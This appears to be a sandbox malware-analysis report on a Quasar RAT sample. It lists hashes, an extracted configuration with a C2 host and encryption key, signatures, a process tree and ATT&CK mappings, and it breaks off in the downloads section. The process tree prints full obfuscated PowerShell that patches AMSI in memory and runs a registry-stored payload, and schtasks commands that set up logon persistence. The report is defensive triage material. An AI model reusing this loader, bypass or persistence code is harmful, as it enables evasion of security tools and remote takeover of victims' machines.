Analysis

  • max time kernel
    1800s
  • max time network
    1797s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4a2639b3-06fd-43b6-af5f-e825dae32727}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2256
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{67684dbd-b4de-4fab-b5e7-ba556b293c74}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3408
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:740
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:900
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:1020
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                1⤵
                  PID:380
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:1040
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1052
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2892
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AtOxPcwyxZHS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MMqEyvedFwUVbg,[Parameter(Position=1)][Type]$GMebarGgfM)$sUxQxSNEZZx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+''+'o'+'r'+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+'l'+'a'+[Char](115)+''+'s'+''+','+'Pu'+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+[Char](111)+'Cl'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$sUxQxSNEZZx.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+'g'+','+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MMqEyvedFwUVbg).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$sUxQxSNEZZx.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+'P'+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+'H'+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l',$GMebarGgfM,$MMqEyvedFwUVbg).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $sUxQxSNEZZx.CreateType();}$dzFGPcvPBLmbf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'o'+'d'+''+'s'+'');$ecKHQVOuQGEuLl=$dzFGPcvPBLmbf.GetMethod(''+'G'+'e'+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+''+'r'+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+''+'c'+''+','+'S'+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhInqOXfQgwxpYrhdeB=AtOxPcwyxZHS @([String])([IntPtr]);$DFzrmQMwlZsAUtAzmaXkvk=AtOxPcwyxZHS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aTnmdkzefyW=$dzFGPcvPBLmbf.GetMethod('Get'+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'el3'+'2'+'.'+[Char](100)+''+'l'+'l')));$jwoGPaYTbocwEI=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$aTnmdkzefyW,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+'a'+'r'+[Char](121)+'A')));$yfsbWtOgckkpFUfjH=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$aTnmdkzefyW,[Object]('V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+'c'+'t')));$GSWMbZx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jwoGPaYTbocwEI,$FhInqOXfQgwxpYrhdeB).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$umzHjvqheltZKIngU=$ecKHQVOuQGEuLl.Invoke($Null,@([Object]$GSWMbZx,[Object]('Am'+'s'+'i'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$qBOkkggwGU=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfsbWtOgckkpFUfjH,$DFzrmQMwlZsAUtAzmaXkvk).Invoke($umzHjvqheltZKIngU,[uint32]8,4,[ref]$qBOkkggwGU);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$umzHjvqheltZKIngU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfsbWtOgckkpFUfjH,$DFzrmQMwlZsAUtAzmaXkvk).Invoke($umzHjvqheltZKIngU,[uint32]8,0x20,[ref]$qBOkkggwGU);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4384
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QlglyWqbmtjf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DZGaThthGEAtMv,[Parameter(Position=1)][Type]$ZsRjgcnOvA)$PIIKxLDqlNR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+'M'+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+'T'+'y'+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d,'+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$PIIKxLDqlNR.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DZGaThthGEAtMv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+'e,'+'M'+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$PIIKxLDqlNR.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+'t'+'ual',$ZsRjgcnOvA,$DZGaThthGEAtMv).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+'n'+'a'+'g'+[Char](101)+'d');Write-Output $PIIKxLDqlNR.CreateType();}$HXsVEoVQXfluK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n32'+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+'d'+'s'+'');$BFbSLDdFqCzMWB=$HXsVEoVQXfluK.GetMethod(''+[Char](71)+'e'+'t'+''+'P'+''+'r'+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ijaGfETXKpPnoJfgqqV=QlglyWqbmtjf @([String])([IntPtr]);$paEIgJnhNedrmecqvdXJqw=QlglyWqbmtjf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bFzVKiIoXbN=$HXsVEoVQXfluK.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'le'+'H'+'a'+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dl'+[Char](108)+'')));$CDFPXeHLfGfETp=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$bFzVKiIoXbN,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$xXmVwaifUPCOMjlOM=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$bFzVKiIoXbN,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$pdGJEpP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CDFPXeHLfGfETp,$ijaGfETXKpPnoJfgqqV).Invoke('a'+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+'l'+''+'l'+'');$hsvYlCncmtmqUAqyM=$BFbSLDdFqCzMWB.Invoke($Null,@([Object]$pdGJEpP,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+'f'+[Char](101)+'r')));$uUViHHwxxv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xXmVwaifUPCOMjlOM,$paEIgJnhNedrmecqvdXJqw).Invoke($hsvYlCncmtmqUAqyM,[uint32]8,4,[ref]$uUViHHwxxv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hsvYlCncmtmqUAqyM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xXmVwaifUPCOMjlOM,$paEIgJnhNedrmecqvdXJqw).Invoke($hsvYlCncmtmqUAqyM,[uint32]8,0x20,[ref]$uUViHHwxxv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'st'+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2352
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:64
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                          1⤵
                          • Drops file in System32 directory
                          PID:1060
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1152
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                            1⤵
                              PID:1188
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                              1⤵
                                PID:1296
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1316
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                  1⤵
                                    PID:1332
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1384
                                      • c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2620
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1476
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                          1⤵
                                            PID:1536
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                            1⤵
                                              PID:1544
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                              1⤵
                                                PID:1592
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                1⤵
                                                  PID:1660
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1704
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1792
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1800
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                        1⤵
                                                          PID:1864
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                          1⤵
                                                            PID:1896
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2028
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2060
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:2144
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                1⤵
                                                                  PID:2384
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2548
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                    1⤵
                                                                      PID:2556
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                      1⤵
                                                                        PID:2568
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2644
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                          1⤵
                                                                            PID:2728
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2760
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:2780
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                              1⤵
                                                                                PID:2812
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                1⤵
                                                                                  PID:2824
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3020
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2004
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3376
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                          2⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3660
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4280
                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4240
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              4⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:3364
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4388
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4008
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                            3⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4552
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3956
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3664
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                            1⤵
                                                                                              PID:4944
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                              1⤵
                                                                                                PID:4608
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4524
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2788
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4620
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:4836
                                                                                                  • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                    C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:2280
                                                                                                    • C:\Windows\System32\InstallAgent.exe
                                                                                                      C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4816
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                        1⤵
                                                                                                          PID:4368
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          1⤵
                                                                                                            PID:3204
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            1⤵
                                                                                                              PID:2392

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

